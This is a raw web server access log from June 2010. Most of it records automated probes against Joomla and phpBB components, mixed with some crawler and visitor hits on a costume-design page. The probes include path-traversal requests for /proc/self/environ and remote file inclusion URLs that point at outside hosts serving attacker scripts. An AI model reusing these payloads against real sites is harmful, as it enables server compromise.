64.237.56.50 - - [21/Jun/2010:01:28:35 -0500] "GET /logs//*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:01:28:35 -0500] "GET //*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
94.247.178.153 - - [21/Jun/2010:01:29:07 -0500] "GET /logs//*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
94.247.178.153 - - [21/Jun/2010:01:29:07 -0500] "GET //*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
62.43.194.164 - - [21/Jun/2010:01:29:13 -0500] "GET /logs/access_log.1274572800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.195.112.180 - - [21/Jun/2010:01:30:03 -0500] "GET /logs/access_log.1192492800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [21/Jun/2010:01:30:31 -0500] "GET /logs/access_log.1216684800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
82.76.12.197 - - [21/Jun/2010:01:31:04 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:01:31:04 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:01:31:04 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.831"
216.17.105.143 - - [21/Jun/2010:01:31:20 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:01:31:20 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:01:31:20 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.830"
125.249.199.195 - - [21/Jun/2010:01:33:03 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:01:33:03 -0500] "GET /logs/access_log.1272067200//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:01:33:03 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
203.211.149.167 - - [21/Jun/2010:01:33:44 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.17.105.143 - - [21/Jun/2010:01:34:13 -0500] "GET /logs/access_log.1274572800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:01:34:21 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:01:34:21 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:01:34:21 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.830"
203.211.149.167 - - [21/Jun/2010:01:35:20 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:01:37:29 -0500] "GET /logs/access_log.1274572800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
200.11.75.76 - - [21/Jun/2010:01:37:47 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
200.11.75.76 - - [21/Jun/2010:01:37:48 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.11.75.76 - - [21/Jun/2010:01:37:48 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
216.17.105.143 - - [21/Jun/2010:01:39:41 -0500] "GET /logs/access_log.1274572800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.830"
67.195.112.180 - - [21/Jun/2010:01:42:26 -0500] "GET /logs/access_log.1274400000 HTTP/1.0" 200 601189 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.95.249.246 - - [21/Jun/2010:01:45:59 -0500] "GET /logs//*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
194.95.249.246 - - [21/Jun/2010:01:45:59 -0500] "GET //*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.813"
194.95.249.246 - - [21/Jun/2010:01:46:23 -0500] "GET /logs//*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
194.95.249.246 - - [21/Jun/2010:01:46:23 -0500] "GET //*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.813"
203.211.129.97 - - [21/Jun/2010:01:52:10 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.195.112.180 - - [21/Jun/2010:01:56:27 -0500] "GET /logs/access_log.1221004800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.95.249.246 - - [21/Jun/2010:02:11:05 -0500] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.813"
194.95.249.246 - - [21/Jun/2010:02:11:07 -0500] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.813"
94.247.178.153 - - [21/Jun/2010:02:11:10 -0500] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
94.247.178.153 - - [21/Jun/2010:02:11:21 -0500] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
194.95.249.246 - - [21/Jun/2010:02:11:52 -0500] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.813"
94.247.178.153 - - [21/Jun/2010:02:12:31 -0500] "GET /logs/access_log.1274572800//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.805"
94.247.178.153 - - [21/Jun/2010:02:12:32 -0500] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
94.247.178.153 - - [21/Jun/2010:02:12:32 -0500] "GET /logs//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
194.95.249.246 - - [21/Jun/2010:02:13:10 -0500] "GET /logs/access_log.1274572800//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.813"
194.95.249.246 - - [21/Jun/2010:02:13:10 -0500] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.813"
194.95.249.246 - - [21/Jun/2010:02:13:11 -0500] "GET /logs//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
194.95.249.246 - - [21/Jun/2010:02:15:11 -0500] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.813"
134.147.125.101 - - [21/Jun/2010:02:15:53 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
94.247.178.153 - - [21/Jun/2010:02:18:48 -0500] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
207.46.199.193 - - [21/Jun/2010:02:20:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.211.129.97 - - [21/Jun/2010:02:27:49 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
188.40.232.234 - - [21/Jun/2010:02:28:06 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
188.40.232.234 - - [21/Jun/2010:02:28:06 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
188.40.232.234 - - [21/Jun/2010:02:28:06 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
194.95.249.246 - - [21/Jun/2010:02:32:53 -0500] "GET /logs/access_log.1274572800//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.813"
194.95.249.246 - - [21/Jun/2010:02:32:53 -0500] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.813"
194.95.249.246 - - [21/Jun/2010:02:32:54 -0500] "GET /logs//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
188.40.232.234 - - [21/Jun/2010:02:34:08 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
188.40.232.234 - - [21/Jun/2010:02:34:08 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
188.40.232.234 - - [21/Jun/2010:02:34:08 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
119.77.233.136 - - [21/Jun/2010:02:34:51 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
119.77.233.136 - - [21/Jun/2010:02:34:57 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
94.247.178.153 - - [21/Jun/2010:02:36:05 -0500] "GET /logs/access_log.1274572800//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.805"
94.247.178.153 - - [21/Jun/2010:02:36:06 -0500] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
94.247.178.153 - - [21/Jun/2010:02:36:06 -0500] "GET /logs//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
94.247.178.153 - - [21/Jun/2010:02:36:43 -0500] "GET /logs/access_log.1274572800//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.805"
94.247.178.153 - - [21/Jun/2010:02:36:43 -0500] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
94.247.178.153 - - [21/Jun/2010:02:36:44 -0500] "GET /logs//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
94.247.178.153 - - [21/Jun/2010:02:39:26 -0500] "GET /logs/access_log.1274227200//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.805"
67.195.112.180 - - [21/Jun/2010:02:41:37 -0500] "GET /?S=D HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.247.178.153 - - [21/Jun/2010:02:44:35 -0500] "GET /logs/access_log.1274832000//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.805"
94.247.178.153 - - [21/Jun/2010:02:44:44 -0500] "GET /logs/access_log.1273622400//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.805"
94.247.178.153 - - [21/Jun/2010:02:44:44 -0500] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
94.247.178.153 - - [21/Jun/2010:02:44:44 -0500] "GET /logs//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
62.43.194.164 - - [21/Jun/2010:02:46:35 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:02:46:35 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:02:46:35 -0500] "GET /logs/access_log.1274572800%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:02:47:17 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:02:47:17 -0500] "GET /logs/access_log.1274572800%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:02:47:17 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.250.255.243 - - [21/Jun/2010:02:50:05 -0500] "GET /rachel%20study/ HTTP/1.1" 404 297 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.127.70.140 - - [21/Jun/2010:03:00:20 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
207.46.199.185 - - [21/Jun/2010:03:00:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.127.70.140 - - [21/Jun/2010:03:01:23 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:03:08:43 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:03:08:44 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:03:08:44 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:03:09:36 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:03:09:36 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:03:09:36 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
118.137.14.152 - - [21/Jun/2010:03:13:20 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://www.facebook.com/pages/Costume-design/108152895879633?v=stream&ref=ts""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:13:24 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:13:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
216.127.70.140 - - [21/Jun/2010:03:13:36 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:03:13:36 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:03:13:36 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
118.137.14.152 - - [21/Jun/2010:03:13:42 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:13:45 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:13:45 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:13:47 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
211.53.209.67 - - [21/Jun/2010:03:13:51 -0500] "GET /logs//includes/functions_mod_user.php?phpbb_root_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.53.209.67 - - [21/Jun/2010:03:13:51 -0500] "GET /logs/access_log.1274572800%20%20//includes/functions_mod_user.php?phpbb_root_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
211.53.209.67 - - [21/Jun/2010:03:13:51 -0500] "GET //includes/functions_mod_user.php?phpbb_root_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
118.137.14.152 - - [21/Jun/2010:03:14:07 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:10 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:11 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:12 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
